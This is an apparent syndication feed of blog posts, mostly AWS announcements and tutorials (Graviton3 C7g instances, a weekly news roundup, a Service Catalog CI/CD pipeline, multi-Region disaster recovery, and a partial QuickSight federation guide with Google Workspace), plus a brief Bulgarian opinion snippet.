New – Amazon EC2 C7g Instances, Powered by AWS Graviton3 Processors

Post Syndicated from Sébastien Stormacq original https://aws.amazon.com/blogs/aws/new-amazon-ec2-c7g-instances-powered-by-aws-graviton3-processors/

I am excited to announce that Amazon Elastic Compute Cloud (Amazon EC2) C7g instances powered by the latest AWS Graviton3 processors that have been available in preview since re:Invent last year are now available for all.

Let’s decompose the name C7g: the “C” instance family is designed for compute-intensive workloads. This is the 7th generation of this instance family. And the “g” means it is based on AWS Graviton, the silicon designed by AWS. These instances are the first instances to be powered by the latest generation of AWS Graviton, the Graviton3 processors.

As you bring more diverse workloads to the cloud, and as your compute, storage, and networking demands increase at a rapid pace, you are asking us to push the price performance boundary even further so that you can accelerate your migration to the cloud and optimize your costs. Additionally, you are looking for more energy-efficient compute options to help you reduce your carbon footprint and achieve your sustainability goals. We do this by working back from your requests, and innovating at a rapid pace across all levels of the AWS infrastructure. Our Graviton chips offer better performance at lower cost along with enhanced capabilities. For example, AWS Graviton3 processors offer you enhanced security with always-on memory encryption, dedicated caches for every vCPU, and support for pointer authentication.

Let’s illustrate this with numbers. When we launched Graviton2-based instances, they provided up to 40 percent better price/performance for a wide variety of workloads over comparable fifth-generation x86-based instances. We now have 12 instance families (M6g, M6gd, C6g, C6gd, C6gn, R6g, R6gd, T4g, X2gd, Im4gn, Is4gen, and G5g) that are powered by AWS Graviton2 processors that provide significant price performance benefits for a wide range of workloads. In 2021, we saw tens of thousands of AWS customers take advantage of this innovation by using Graviton2-based EC2 instances.

Our next generation, Graviton3 processors, deliver up to 25 percent higher performance, up to 2x higher floating-point performance, and 50 percent faster memory access based on leading-edge DDR5 memory technology compared with Graviton2 processors.

Graviton3 also uses up to 60 percent less energy for the same performance as comparable EC2 instances, which helps you reduce your carbon footprint.

Snap Inc, known for its popular social media services such as Snapchat and Bitmoji, adopted AWS Graviton2-based instances to optimize their price performance on Amazon EC2. Aaron Sheldon, software engineer at Snap, told us: “We trialed the new AWS Graviton3-based Amazon EC2 C7g instances and found that they provide significant performance improvements on real workloads compared to previous generation C6g instances. We are excited to migrate our Graviton2-based workloads to Graviton3, including messaging, storage, and friend graph workloads.”

The C7g instances are available in eight sizes with 1, 2, 4, 8, 16, 32, 48, and 64 vCPUs. C7g instances support configurations up to 128 GiB of memory, 30 Gbps of network performance, and 20 Gbps of Amazon Elastic Block Store (EBS) performance. These instances are powered by the AWS Nitro System, a combination of dedicated hardware and a lightweight hypervisor.

The following table summarizes the key characteristics of each instance type in this family.

Instance Name vCPUs
Memory
Network Bandwidth
EBS Bandwidth
c7g.medium 1 2 GiB up to 12.5 Gbps up to 10 Gbps
c7g.large 2 4 GiB up to 12.5 Gbps up to 10 Gbps
c7g.xlarge 4 8 GiB up to 12.5 Gbps up to 10 Gbps
c7g.2xlarge 8 16 GiB up to 15 Gbps up to 10 Gbps
c7g.4xlarge 16 32 GiB up to 15 Gbps up to 10 Gbps
c7g.8xlarge 32 64 GiB 15 Gbps 10 Gbps
c7g.12xlarge 48 96 GiB 22.5 Gbps 15 Gbps
c7g.16xlarge 64 128 GiB 30 Gbps 20 Gbps

C7g instances are initially available in US East (N. Virginia) and US West (Oregon) AWS Regions; other Regions will be added shortly after launch.

As usual, you can purchase C7g capacity on demand, as Reserved Instances, or as Spot instances, and use your Saving Plans. The pricing details are available on the EC2 pricing page.

I have the chance to talk with AWS customers on a daily basis, and many of my discussions are around price performance and the sustainability of their workloads. With more than 500 instance types to choose from, one question I often receive is: what are the workloads that would benefit from C7g?

You will find that C7g instances provide the best price performance within their instance families for a broad spectrum of compute-intensive workloads, including application servers, micro services, high-performance computing, electronic design automation, gaming, media encoding, or CPU-based ML inference. These instances are ideal for all Linux-based workloads, including containerized and micro service-based applications built using Amazon Elastic Kubernetes Service (EKS), Amazon Elastic Container Service (Amazon ECS), Amazon Elastic Container Registry, Kubernetes, and Docker, and written in popular programming languages such as C/C++, Rust, Go, Java, Python, .NET Core, Node.js, Ruby, and PHP.

The next question I receive is: given that Graviton instances are based on Arm architecture, how difficult is it to migrate from x86?

Graviton3 instances are supported by a broad choice of operating systems, independent software vendors, container services, agents, and developer tools, enabling you to migrate your workloads with minimal effort.

Applications and scripts written in high-level programming languages such as Python, Node.js, Ruby, Java, or PHP will typically just require a redeployment. Applications written in lower-level programming languages such as C/C++, Rust, or Go will require a re-compilation.

But you don’t always need to migrate your applications. Several managed services are based on Graviton already, such as Amazon ElastiCache, Amazon EKS, Amazon ECS, Amazon Relational Database Service (RDS), Amazon EMR, Amazon Aurora, and Amazon OpenSearch Service, and your application can benefit from Graviton with minimal efforts. A French customer told me recently they migrated a significant portion of their Amazon EMR clusters to Graviton by doing just one line change in their Terraform scripts; all the rest worked as-is.

For those of you building with serverless, we have also released Graviton support for AWS Fargate and AWS Lambda, extending the price, efficiency, and performance benefits of Graviton to serverless workloads. Lambda functions using Graviton2 can see up to 34 percent better price/performance.

Reducing the carbon footprint of your organization is also of paramount importance. Reducing the carbon footprint of cloud-based workloads is a shared responsibility between you and us. We do our part by innovating at all levels: from the materials used to build our facilities, the usage of water for cooling, and the production of renewable energy, down to inventing new silicons that are more energy efficient. To help you meet your own sustainability goals, we added a sustainability pillar to the AWS Well-Architected framework, and we released the Customer Carbon Footprint tool. Graviton3 fits into that context. It uses up to 60 percent less energy for the same performance as comparable EC2 instances.

We do our part in this shared responsibility model, and now, it is your turn. You can use our innovations and tools to help you optimize your workloads and only use the resources you need. Take the occasion to write clever code that uses fewer CPU cycles, less storage, or less network bandwidth. And be sure to select energy-efficient options, such as Graviton3-based instance types or managed services, when deploying your code.

To help you to get started migrating your applications to Graviton instance types today, we curated this list of technical resources. Have a look at it. To learn more about Graviton-based instances, visit the Graviton page or the C7g page and check out this video:

If you’d like to get started with Graviton-based instances for free, we also just reintroduced the free trial on T4g.small instances for up to 750 hours/month until the end of this year (December 31, 2022).

And now, go build 😉

— seb

AWS Week In Review – May 23, 2022

Post Syndicated from Sébastien Stormacq original https://aws.amazon.com/blogs/aws/aws-week-in-review-may-27-2022/

This post is part of our Week in Review series. Check back each week for a quick roundup of interesting news and announcements from AWS!

This is the right place to quickly learn about recent AWS news from last week, in just about five minutes or less. This week, I have collected a couple of news items that might be of interest to you, the IT professionals, developers, system administrators, or any type of builders that have their hands on the AWS console, the CLI, or that are writing code.

Last Week’s Launches
The launches that caught my attention last week are the following:

EC2 now supports NitroTPM and SecureBoot – A Trusted Platform Module is often a discrete chip in a computer where you can store secrets and release them to the operating system only when the system is in a known good state. You typically use TPM modules to store operating-system-level volume encryption keys, such as the ones used by BitLocker on Windows or LUKS. NitroTPM is a virtual TPM module available on selected instance families that allows you to deploy your workloads depending on TPM functionalities on EC2 instances.

Amazon EC2 Auto Scaling now backfills predictive scaling forecasts so you can quickly validate forecast accuracy. Auto Scaling Predictive Scaling is a capability of Auto Scaling that allows you to scale your fleet in and out based on observed usage patterns. It uses AI/ML to predict when your fleet needs more or less capacity. It allows you to scale a fleet in advance of the scaling event and have the fleet prepared at peak times. The new backfills shows you how predictive scaling would have scaled your fleet during the last 14 days. This allows you to quickly decide if the predictive scaling policy is accurate for your applications by comparing the demand and capacity forecasts against actual demand immediately after you create a predictive scaling policy.

AWS Backup adds support for two new managed file systems, Amazon FSx for OpenZFS and Amazon Fsx for NetApp ONTAP. These additions helps you meet your centralized data protection and regulatory compliance needs. You can now use AWS Backup’s policy-based capabilities to centrally protect Amazon FSx for NetApp ONTAP or Amazon Fsx for OpenZFS, along with the other AWS services for storage, database, and compute that AWS Backup supports.

AWS App Mesh now supports IPv6 AWS App Mesh is a service mesh that provides application-level networking to make it easy for your services to communicate with each other across multiple types of compute infrastructure. The new support for IPv6 allows you to support workloads running in IPv6 networks and to invoke App Mesh APIs over IPv6. This helps you meet IPv6 compliance requirements, and removes the need for complex networking configuration to handle address translation between IPv4 and IPv6.

Amazon Chime SDK now supports video background replacement and blur on iOS and Android. When you want to integrate audio and video call capabilities in your mobile applications, the Chime SDK is the easiest way to get started. It provides an easy-to-use API that uses the scalable and robust Amazon Chime backend to power your communications. For example, Slack is using Chime as backend for the communications in their apps. The Chime SDK client libraries for iOS and Android now include video background replacement and blur, which developers can use to reduce visual distractions and help increase visual privacy for mobile users on iOS and Android.

For a full list of AWS announcements, be sure to keep an eye on the What’s New at AWS page.

Other AWS News
Some other updates and news that you may have missed:

Amazon Redshift: Ten years of continuous reinvention. This is an Amazon Redshift research paper that will be presented at a leading international forum for database researchers. The authors reflect on how far the first petabyte-scale cloud data warehouse has advanced since it was announced ten years ago.

Improve Your Security at the Edge with AWS IoT Services is a new blog post on the IoT channel. We understand the risks associated with operating at the edge and that you need additional capabilities to ensure that your data is protected. AWS IoT services can help you with end-to-end data protection, device security, and device identification to create the foundation of an expanded information security model and confidently operate at the edge.

AWS Open Source News and Updates – Ricardo Sueiras, my colleague from the AWS Developer Relation team, runs this newsletter. It brings you all the latest open-source projects, posts, and more. Read edition #113 here.

Upcoming AWS Events
CDK Day, on May 26 is a one-day fully virtual event dedicated to the AWS Cloud Development Kit. With four versions of the CDK released (AWS, Terraform, CDK8s, and Projen), we tought the CDK deserves its own full-fledged conference. We will take one day and showcase the brightest and best of CDK from across the whole product family. Let’s talk serverless, Kubernetes and multi-cloud all on the same day! CDK Day will take place on May 26, 2022 and will be fully virtual, live-streamed to our YouTube channel. Book your ticket now, it’s free.

The AWS Summit season is mostly over in Europe, but there are upcoming Summits in North America and the Asia Pacific Regions. Here are some virtual and in-person Summits that might be close to you:

More to come in July, August, and September.

You can register for re:MARS to get fresh ideas on topics such as machine learning, automation, robotics, and space. The conference will be in person in Las Vegas, June 21–24.

That’s all for this week. Check back next Monday for another Week in Review!

— seb

Govern CI/CD best practices via AWS Service Catalog

Post Syndicated from César Prieto Ballester original https://aws.amazon.com/blogs/devops/govern-ci-cd-best-practices-via-aws-service-catalog/

Introduction

AWS Service Catalog enables organizations to create and manage Information Technology (IT) services catalogs that are approved for use on AWS. These IT services can include resources such as virtual machine images, servers, software, and databases to complete multi-tier application architectures. AWS Service Catalog lets you centrally manage deployed IT services and your applications, resources, and metadata , which helps you achieve consistent governance and meet your compliance requirements. In addition,  this configuration enables users to quickly deploy only approved IT services.

In large organizations, as more products are created, Service Catalog management can become exponentially complicated when different teams work on various products. The following solution simplifies Service Catalog products provisioning by considering elements such as shared accounts, roles, or users who can run portfolios or tags in the form of best practices via Continuous Integrations and Continuous Deployment (CI/CD) patterns.

This post demonstrates how Service Catalog Products can be delivered by taking advantage of the main benefits of CI/CD principles along with reducing complexity required to sync services. In this scenario, we have built a CI/CD Pipeline exclusively using AWS Services and the AWS Cloud Development Kit (CDK) Framework to provision the necessary Infrastructure.

Customers need the capability to consume services in a self-service manner, with services built on patterns that follow best practices, including focus areas such as compliance and security. The key tenants for these customers are: the use of infrastructure as code (IaC), and CI/CD. For these reasons, we built a scalable and automated deployment solution covered in this post.Furthermore, this post is also inspired from another post from the AWS community, Building a Continuous Delivery Pipeline for AWS Service Catalog.

Solution Overview

The solution is built using a unified AWS CodeCommit repository with CDK v1 code, which manages and deploys the Service Catalog Product estate. The solution supports the following scenarios: 1) making Products available to accounts and 2) provisioning these Products directly into accounts. The configuration provides flexibility regarding which components must be deployed in accounts as opposed to making a collection of these components available to account owners/users who can in turn build upon and provision them via sharing.

Figure shows the pipeline created comprised of stages

The pipeline created is comprised of the following stages:

  1. Retrieving the code from the repository
  2. Synthesize the CDK code to transform it into a CloudFormation template
  3. Ensure the pipeline is defined correctly
  4. Deploy and/or share the defined Portfolios and Products to a hub account or multiple accounts

Deploying and using the solution

Deploy the pipeline

We have created a Python AWS Cloud Development Kit (AWS CDK) v1 application hosted in a Git Repository. Deploying this application will create the required components described in this post. For a list of the deployment prerequisites, see the project README.

Clone the repository to your local machine. Then, bootstrap and deploy the CDK stack following the next steps.

git clone https://github.com/aws-samples/aws-cdk-service-catalog-pipeline
cd aws-cdk-service-catalog
pip install -r requirements.txt
cdk bootstrap aws://account_id/eu-west-1
cdk deploy

The infrastructure creation takes around 3-5 minutes to complete deploying the AWS CodePipelines and repository creation. Once CDK has deployed the components, you will have a new empty repository where we will define the target Service Catalog estate. To do so, clone the new repository and push our sample code into it:

git clone https://git-codecommit.eu-west-1.amazonaws.com/v1/repos/service-catalog-repo
git checkout -b main
cd service-catalog-repo
cp -aR ../cdk-service-catalog-pipeline/* .
git add .
git commit -am "First commit"
git push origin main

Review and update configuration

Our cdk.json file is used to manage context settings such as shared accounts, permissions, region to deploy, etc.

shared_accounts_ecs: AWS account IDs where the ECS portfolio will be shared
shared_accounts_storage: AWS account IDs where the Storage portfolio will be shared
roles: ARN for the roles who will have permissions to access to the Portfolio
users: ARN for the users who will have permissions to access to the Portfolio
groups: ARN for the groups who will have permissions to access to the Portfolio
hub_account: AWS account ID where the Portfolio will be created
pipeline_account: AWS account ID where the main Infrastructure Pipeline will be created
region: the AWS region to be used for the deployment of the account
"shared_accounts_ecs":["012345678901","012345678902"],
    "shared_accounts_storage":["012345678901","012345678902"],
    "roles":[],
    "users":[],
    "groups":[],
    "hub_account":"012345678901",
    "pipeline_account":"012345678901",
    "region":"eu-west-1"

There are two mechanisms that can be used to create Service Catalog Products in this solution: 1) providing a CloudFormation template or 2) declaring a CDK stack (that will be transformed as part of the pipeline). Our sample contains two Products, each demonstrating one of these options: an Amazon Elastic Container Services (ECS) deployment and an Amazon Simple Storage Service (S3) product.

These Products are automatically shared with accounts specified in the shared_accounts_storage variable. Each product is managed by a CDK Python file in the cdk_service_catalog folder.

Figure shows Pipeline stages that AWS CodePipeline runs through

Figure shows Pipeline stages that AWS CodePipeline runs through

Figure shows Pipeline stages that AWS CodePipeline runs through

The Pipeline stages that AWS CodePipeline runs through are as follows:

  1. Download the AWS CodeCommit code
  2. Synthesize the CDK code to transform it into a CloudFormation template
  3. Auto-modify the Pipeline in case you have made manual changes to it
  4. Display the different Portfolios and Products associated in a Hub account in a Region or in multiple accounts

Adding new Portfolios and Products

To add a new Portfolio to the Pipeline, we recommend creating a new class under cdk_service_catalog similar to cdk_service_catalog_ecs_stack.py from our sample. Once the new class is created with the products you wish to associate, we instantiate the new class inside cdk_pipelines.py, and then add it inside the wave in the stage. There are two ways to create portfolio products. The first one is by creating a CloudFormation template, as can be seen in the Amazon Elastic Container Service (ECS) example.  The second way is by creating a CDK stack that will be transformed into a template, as can be seen in the Storage example.

Product and Portfolio definition:

class ECSCluster(servicecatalog.ProductStack):
    def __init__(self, scope, id):
        super().__init__(scope, id)
        # Parameters for the Product Template
        cluster_name = cdk.CfnParameter(self, "clusterName", type="String", description="The name of the ECS cluster")
        container_insights_enable = cdk.CfnParameter(self, "container_insights", type="String",default="False",allowed_values=["False","True"],description="Enable Container Insights")
        vpc = cdk.CfnParameter(self, "vpc", type="AWS::EC2::VPC::Id", description="VPC")
        ecs.Cluster(self,"ECSCluster_template", enable_fargate_capacity_providers=True,cluster_name=cluster_name.value_as_string,container_insights=bool(container_insights_enable.value_as_string),vpc=vpc)
              cdk.Tags.of(self).add("key", "value")

Clean up

The following will help you clean up all necessary parts of this post: After completing your demo, feel free to delete your stack using the CDK CLI:

cdk destroy --all

Conclusion

In this post, we demonstrated how Service Catalog deployments can be accelerated by building a CI/CD pipeline using self-managed services. The Portfolio & Product estate is defined in its entirety by using Infrastructure-as-Code and automatically deployed based on your configuration. To learn more about AWS CDK Pipelines or AWS Service Catalog, visit the appropriate product documentation.

Authors:

 

César Prieto Ballester

César Prieto Ballester is a Senior DevOps Consultant at AWS. He enjoys automating everything and building infrastructure using code. Apart from work, he plays electric guitar and loves riding his mountain bike.

Daniel Mutale

Daniel Mutale is a Cloud Infrastructure Architect at AWS Professional Services. He enjoys creating cloud based architectures and building out the underlying infrastructure to support the architectures using code. Apart from work, he is an avid animal photographer and has a passion for interior design.

Raphael Sack

Raphael is a technical business development manager for Service Catalog & Control Tower. He enjoys tinkering with automation and code and active member of the management tools community.

Disaster recovery with AWS managed services, Part 2: Multi-Region/backup and restore

Post Syndicated from Dhruv Bakshi original https://aws.amazon.com/blogs/architecture/disaster-recovery-with-aws-managed-services-part-ii-multi-region-backup-and-restore/

In part I of this series, we introduced a disaster recovery (DR) concept that uses managed services through a single AWS Region strategy. In part two, we introduce a multi-Region backup and restore approach. With this approach, you can deploy a DR solution in multiple Regions, but it will be associated with longer RPO/RTO. Using a backup and restore strategy will safeguard applications and data against large-scale events as a cost-effective solution, but will result in longer downtimes and greater loss of data in the event of a disaster as compared to other strategies as shown in Figure 1.

DR Strategies

Figure 1. DR Strategies

Implementing the multi-Region/backup and restore strategy

Using multiple Regions ensures resiliency in the most serious, widespread outages. A secondary Region protects workloads against being unable to run within a given Region, because they are wide and geographically dispersed.

Architecture overview

The application diagram presented in Figures 2.1 and 2.2 refers to an application that processes payment transactions, which was modernized to utilize managed services in the AWS Cloud. In this post, we’ll show you which AWS services it uses and how they work to maintain multi-Region/backup and restore strategy.

These figures show how to successfully implement the backup and restore strategy and successfully fail over your workload. The following sections list the components of the example application presented in the figures, which works as follows:

Multi-Region backup

Figure 2.1. Multi-Region backup

Multi-Region restore

Figure 2.2. Multi-Region restore

Route 53

Route 53 health checks monitor the health and performance of your web applications, web servers, and other resources. Health checks are necessary for configuring DNS failover within Route 53. Once an application or resource becomes unhealthy, you’ll need to initiate a manual failover process to create resources in the secondary Region. In our architecture, we use CloudWatch alarms to automate notifications of changes in health status.

Please check out the Creating Disaster Recovery Mechanisms Using Amazon Route 53 blog post for additional DR mechanisms using Amazon Route 53.

Amazon EKS control plane

Amazon Elastic Kubernetes Service (Amazon EKS) automatically scales control plane instances based on load, automatically detects and replaces unhealthy control plane instances, and restarts them across the Availability Zones within the Region as needed. Because on-demand clusters are provisioned in the secondary Region, AWS also manages the control plane the same way.

Amazon EKS data plane

It is a best practice to create worker nodes using Amazon Elastic Compute Cloud (Amazon EC2) Auto Scaling groups instead of creating individual EC2 instances and joining them to the cluster. This is because Amazon EC2 Auto Scaling groups automatically replace any terminated or failed nodes, which ensures that the cluster always has the capacity to run your workload.

The Amazon EKS control plane and data plane will be created on demand in the secondary Region during an outage via Infrastructure-as-a-Code (IaaC) such as AWS CloudFormation, Terraform, etc. You should pre-stage all networking requirements like virtual private cloud (VPC), subnets, route tables, gateways and deploy the Amazon EKS cluster during an outage in the primary Region.

As shown in the Backup and restore your Amazon EKS cluster resources using Velero blog post, you may use a third-party tool like Velero for managing snapshots of persistent volumes. These snapshots can be stored in an Amazon Simple Storage Service (Amazon S3) bucket in the primary Region, which will be replicated to an S3 bucket in another Region via cross-Region replication.

During an outage in the primary Region, you can use the tool in the secondary Region to restore volumes from snapshots in the standby cluster.

OpenSearch Service

For domains running Amazon OpenSearch Service, OpenSearch Service takes hourly automated snapshots and retains up to 336 for 14 days. These snapshots can only be used for cluster recovery within the same Region as the primary OpenSearch cluster.

You can use OpenSearch APIs to create a manual snapshot of an OpenSearch cluster, which can be stored in a registered repository like Amazon S3. You can do this manually or create a scheduled Lambda function based on their RPO, which prompts creation of a manual snapshot that will be stored in an S3 bucket. Amazon S3 cross-Region replication will then automatically and asynchronously copy objects across S3 buckets.

You can restore OpenSearch Service clusters by creating the cluster on demand via CloudFormation and using OpenSearch APIs to restore the snapshot from an S3 bucket.

Amazon RDS Postgres

Amazon Relational Database Service (Amazon RDS) can copy continuous backups cross-Region. You can configure your Amazon RDS database instance to replicate snapshots and transaction logs to a destination Region of your choice.

If a continuous backup rule also specifies a cross-account or cross-Region copy, AWS Backup takes a snapshot of the continuous backup, copies that snapshot to the destination vault, and then deletes the source snapshot. For continuous backup of Amazon RDS, AWS Backup creates a snapshot every 24 hours and stores transaction logs every 5 minutes in-Region. The Backup Frequency setting only applies to cross-Region backups of these continuous backups. Backup Frequency determines how often AWS Backup:

  • Creates a snapshot at that point in time from the existing snapshot plus all transaction logs up to that point
  • Copies snapshots to the other Region(s)
  • Deletes snapshots (because it only was created to be copied)

For more information, refer to the Point-in-time recovery and continuous backup for Amazon RDS with AWS Backup blog post.

ElastiCache

You can export and import backup and copy API calls for Amazon ElastiCache to develop a snapshot and restore strategy in a secondary Region. You can either prompt a manual backup and copy of that backup to S3 bucket or create a pair of Lambda functions to run at a schedule to meet the RPO requirements. The Lambda functions will prompt a manual backup, which creates a .rdb to an S3 bucket. Amazon S3 cross-Region replication will then handle asynchronous copy of the backup to an S3 bucket in a secondary Region.

You can use CloudFormation to create an ElastiCache cluster on demand and use CloudFormation properties such as SnapshotArns and SnapshotName to point to the desired ElastiCache backup stored in Amazon S3 to seed the cluster in the secondary Region.

Amazon Redshift

Amazon Redshift takes automatic, incremental snapshots of your data periodically and saves them to Amazon S3. Additionally, you can take manual snapshots of your data whenever you want.

To precisely control when snapshots are taken, you can create a snapshot schedule and attach it to one or more clusters. You can also configure cross-Region snapshot copy, which will automatically copy all your automated and manual snapshots to another Region.

During an outage, you can create the Amazon Redshift cluster on demand via CloudFormation and use CloudFormation properties such as SnapshotIdentifier to restore the new cluster from that snapshot.

Note: You can add an additional layer of protection to your backups through AWS Backup Vault Lock, S3 Object Lock, and Encrypted Backups.

Conclusion

With greater adoption of managed services within the cloud, there is a need to think of creative ways to implement a cost-effective DR solution. This backup and restore approach offered in this post will lower costs through more lenient RPO/RTO requirements, while providing a solution to utilize AWS managed services.

In the next post, we will discuss a multi-Region active/active strategy for the same application stack illustrated in this post.

Other posts in this series

Related information

Looking for more architecture content? AWS Architecture Center provides reference architecture diagrams, vetted architecture solutions, Well-Architected best practices, patterns, icons, and more!

Перестройка, тролове!

Post Syndicated from original https://bivol.bg/%D0%BF%D0%B5%D1%80%D0%B5%D1%81%D1%82%D1%80%D0%BE%D0%B9%D0%BA%D0%B0-%D1%82%D1%80%D0%BE%D0%BB%D0%BE%D0%B2%D0%B5.html

понеделник 23 май 2022


Не е лесно да си извадиш главата от гъза. Ще дам личен пример. Близо пет петилетки залагах. Печелех, губех, въртях се в омагьосан кръг. Никога не можеш да победиш казиното.…

Enable Amazon QuickSight federation with Google Workspace

Post Syndicated from Sriharsh Adari original https://aws.amazon.com/blogs/big-data/enable-amazon-quicksight-federation-with-google-workspace/

Amazon QuickSight is a scalable, serverless, embeddable, machine learning (ML)-powered business intelligence (BI) service built for the cloud that supports identity federation in both Standard and Enterprise editions. Organizations are working towards centralizing their identity and access strategy across all of their applications, including on-premises, third-party, and applications on AWS. Many organizations use Google Workspace to control and manage user authentication and authorization centrally. You can enable federation to QuickSight accounts without needing to create and manage users. This authorizes users to access QuickSight assets—analyses, dashboards, folders, and datasets—through centrally managed Google Workspace Identities.

In this post, we go through the steps to configure federated single sign-on (SSO) between a Google Workspace instance and QuickSight account. We demonstrate registering an SSO application in Google Workspace, and map QuickSight roles (admin, author, and reader) to Google Workspace Identities. These QuickSight roles represent three different personas supported in QuickSight. Administrators can publish the QuickSight app in a Google Workspace Dashboard to enable users to SSO to QuickSight using their Google Workspace credentials.

Solution overview

In your organization, the portal is typically a function of your identity provider (IdP), which handles the exchange of trust between your organization and QuickSight.

On the Google Workspace Dashboard, you can review a list of apps. This post shows you how to configure the custom app for AWS.

The user flow consists of the following steps:

  1. The user logs in to your organization’s portal and chooses the option to go to the QuickSight console.
  2. The portal verifies the user’s identity in your organization.
  3. The portal generates a SAML authentication response that includes assertions that identify the user and include attributes about the user. The portal sends this response to the client browser. Although not discussed here, you can also configure your IdP to include a SAML assertion attribute called SessionDuration that specifies how long the console session is valid.
  4. The client browser is redirected to the AWS single sign-on endpoint and posts the SAML assertion.
  5. The endpoint requests temporary security credentials on behalf of the user, and creates a QuickSight sign-in URL that uses those credentials.
  6. AWS sends the sign-in URL back to the client as a redirect.
  7. The client browser is redirected to the QuickSight console. If the SAML authentication response includes attributes that map to multiple AWS Identity and Access Management (IAM) roles, the user is first prompted to select the role for accessing the console.

The following diagram illustrates the solution architecture.

The following are the high-level steps to set up federated single sign-on access via Google Workspace:

  1. Download the Google IdP information.
  2. Create an IAM IdP with Google as SAML IdP.
  3. Configure IAM policies for QuickSight roles.
  4. Configure IAM QuickSight roles for federated users.
  5. Create a custom user attribute in Google Workspace.
  6. Add the AWS SAML attributes to your Google Workspace user profile.
  7. Set up the AWS SAML app in Google Workspace.
  8. Grant access to users in Google Workspace.
  9. Verify federated access to your QuickSight instance.

Detailed procedures for each of these steps comprise the remainder of this post.

Prerequisites

For this walkthrough, you should have the following prerequisites:

  • A Google Workspace subscription
  • An AWS account with QuickSight subscription
  • Basic understanding of QuickSight roles—admin, author, and reader
  • Basic understanding of IAM and privileges required to create an IAM identity provider, roles, policies, and users

Download the Google IdP information

First, let’s get the SAML metadata that contains essential information to enable your AWS account to authenticate the IdP and locate the necessary communication endpoint locations. Complete the following steps:

  1. Log in to the Google Workspace Admin console.
  2. On the Admin console home page, under Security in the navigation pane, choose Authentication and SSO with SAML applications.
  3. Under IdP metadata, choose Download Metadata.

Create an IAM IdP with Google as SAML IdP

You now configure Azure AD as your SAML IdP via the IAM console. Complete the following steps:

  1. On the IAM console, choose Identity providers in the navigation pane.
  2. Choose Add provider.
  3. For Configure provider, select SAML.
  4. For Provider name, enter a name for the IdP (such as Google).
  5. For Metadata document, choose Choose file and specify the SAML metadata document that you downloaded.
  6. Choose Add provider.
  7. Document the Amazon Resource Name (ARN) by viewing the IdP you just created.

The ARN should looks similar to arn:aws:iam::<YOURACCOUNTNUMBER>:saml-provider/Google. We need this ARN to configure claim rules later in this post.

Configure IAM policies for QuickSight roles

In this step, we create three IAM policies for different role permissions in QuickSight:

  • QuickSight-Federated-Admin
  • QuickSight-Federated-Author
  • QuickSight-Federated-Reader

Use the following steps to set up the QuickSight-Federated-Admin policy. This policy grants admin privileges in QuickSight to the federated user:

  1. On the IAM console, choose Policies.
  2. Choose Create policy.
  3. Choose JSON and replace the existing text with the following code:
    {
        “Version”: “2012-10-17”,
        “Statement”: [
            {
                “Effect”: “Allow”,
                “Action”: “quicksight:CreateAdmin”,
                “Resource”: “*”
            }
        ]
    }

  4. Choose Review policy.
  5. For Name, enter QuickSight-Federated-Admin.
  6. Choose Create policy.
  7. Repeat these steps to create QuickSight-Federated-Author, and use the following policy to grant author privileges in QuickSight to the federated user:
    {
        “Version”: “2012-10-17”,
        “Statement”: [
            {
                “Effect”: “Allow”,
                “Action”: “quicksight:CreateUser”,
                “Resource”: “*”
            }
        ]
    }

  8. Repeat the steps to create QuickSight-Federated-Reader, and use the following policy to grant reader privileges in QuickSight to the federated user:
    {
        “Version”: "2012-10-17",
        "Statement": [
            {
                "Effect": "Allow",
                "Action": "quicksight:CreateReader",
                "Resource": "*"
            }
        ]
    }

Configure IAM QuickSight roles for federated users

Next, create the roles that Google IdP users assume when federating into QuickSight. The following steps set up the admin role:

  1. On the IAM console, choose Roles in the navigation pane.
  2. Choose Create role.
  3. For Trusted entity type, choose SAML 2.0 federation.
  4. For SAML provider, choose the provider you created earlier (Google).
  5. For Attribute, choose SAML:aud.
  6. For Value, enter https://signin.aws.amazon.com/saml.
  7. Choose Next.
  8. On the Add permissions page, select the QuickSight-Federated-Admin IAM policy you created earlier.
  9. Choose Next.
  10. For Role name, enter QuickSight-Admin-Role.
  11. For Role description, enter a description.
  12. Choose Create role.
  13. On the IAM console, in the navigation pane, choose Roles.
  14. Choose the QuickSight-Admin-Role role you created to open the role’s properties.
  15. On the Trust relationships tab, choose Edit trust relationship.
  16. Under Trusted entities, verify that the IdP you created is listed.
  17. Under Condition, verify that SAML:aud with a value of https://signin.aws.amazon.com/saml is present.
  18. Repeat these steps to create author and reader roles and attach the appropriate policies:
    1. For QuickSight-Author-Role, use the policy QuickSight-Federated-Author.
    2. For QuickSight-Reader-Role, use the policy QuickSight-Federated-Reader.
  19. Navigate to the newly created roles and note the ARNs for them.

We use these ARNs to configure claims rules later in this post. They are in the following format:

  • arn:aws:iam:: <YOURACCOUNTNUMBER>:role/QuickSight-Admin-Role
  • arn:aws:iam:: <YOURACCOUNTNUMBER>:role/QuickSight-Author-Role
  • arn:aws:iam:: <YOURACCOUNTNUMBER>:role/QuickSight-Reader-Role

Create a custom user attribute in Google Workspace

Now let’s create a custom user attribute in your Google Workspace. This allows us to add the SAML attributes that the AWS Management Console expects in order to allow a SAML-based authentication.

  1. Log in to Google Admin console with admin credentials.
  2. Under Directory, choose Users.
  3. On the More options menu, choose Manage custom attributes.
  4. Choose Add Custom Attribute.
  5. For Select type of trusted entity, choose SAML 2.0 federation.
  6. Configure the custom attribute as follows:
    1. Category: Amazon
    2. Description: Amazon Custom Attributes
  7. For Custom fields, enter the following:
    1. Name: Role
    2. Info type: Text
    3. Visibility: Visible to user and admin
    4. No. of values: Multi-value
  8. Choose Add.

The new category appears on the Manage user attributes page.

Add the AWS SAML attributes to the Google Workspace user profile

Now that we have configured a custom user attribute, let’s add the SAML attributes that we noted earlier to the Google Workspace user profile.

  1. While logged in to the Google Admin console with admin credentials, navigate to the Users page.
  2. In the Users list, find the user. If you need help, see Find a user account.
  3. Choose the user’s name to open their account page.
  4. Choose User information.
  5. Choose custom attribute you recently created, named Amazon.
  6. Add a value to this custom attribute noted earlier in the following format: <AWS Role ARN>,<AWS provider/IdP ARN>.
  7. Choose Save.

Set up the AWS SAML app in Google Workspace

Now that we have everything in place, we’re ready to create a SAML app within our Google Workspace account and provide the QuickSight instance starting URL. This provides the entry point for Google Workspace users to SSO into the QuickSight instance.

  1. While logged in to Google Admin console with admin credentials, under Apps, choose Web and mobile apps.
  2. Choose Add App, and Search for apps.
  3. Enter Amazon Web Services in the search field.
  4. In the search results, hover over the Amazon Web Services SAML app and choose Select.
  5. On the Google Identity Provider details page, choose Continue.
  6. On the Service provider details page, the ACS URL and Entity ID values for Amazon Web Services are configured by default.
  7. For Start URL, enter https://quicksight.aws.amazon.com.
